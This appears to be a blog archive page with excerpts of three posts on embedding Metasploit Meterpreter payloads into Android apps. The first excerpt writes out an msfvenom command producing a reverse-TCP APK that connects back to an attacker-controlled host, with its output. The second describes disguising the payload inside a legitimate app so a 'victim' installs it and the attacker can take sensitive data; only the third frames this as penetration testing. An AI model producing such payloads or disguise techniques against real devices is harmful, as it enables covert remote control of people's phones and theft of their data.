Posts

Showing posts from January, 2022

Nasha Exploit Injecting As A Metasploit Payloads Apk Into Android Applications To Remote Control Any Android Device

On the Kali Linux terminal, type:

(root💀diago)-[~]# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.*.* LPORT=4444 R > Nasha.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder specified, outputting raw payload
Payload size: 10184 bytes
...

Embed a Metasploit Payload in an Original .Apk File 2

Embed a Metasploit Payload in an Original .Apk File | Part 2 – Do It Manually

Hi guys, I'm here again with my second tutorial, as I promised. Metasploit's flagship product, the Meterpreter, is a very powerful, all-purpose payload. Once installed on the victim machine, we can do whatever we want to their system by sending out commands to it. For example, we could grab sensitive data out of the compromised system. The Meterpreter payload also comes as an installable .apk file for Android systems. Great! Now we can use Metasploit to compromise Android phones as well. But if you have tried out these payloads, you would know that they do not look convincing. No one in their right mind is going to install and run such an app, which apparently does nothing when it is opened. So how are we going to make the victim run the payload app on their phone? One solution is to embed the payload inside another legitimate app. The app will look and behave exactly as the original...

Injecting Metasploit Payloads into Android Applications

It is possible to use a legitimate Android application as a Trojan in order to exploit the user's actual device. This test is important in every Android security assessment because it allows the penetration tester to discover whether certain protections around the binary are in place. If there are not, and the application could be trojanized by a malicious attacker, then the client should be aware. The process of injecting Metasploit payloads into Android applications can be done both manually and automatically. This post will examine the automated process. However, if time is not a factor in an engagement, then the manual method should be considered.

Payload Generation

Before anything else, the payload that will be used to compromise the mobile device needs to be generated. Metasploit Framework could be used for this activity since it can produce a payload and then extract it as APK fi...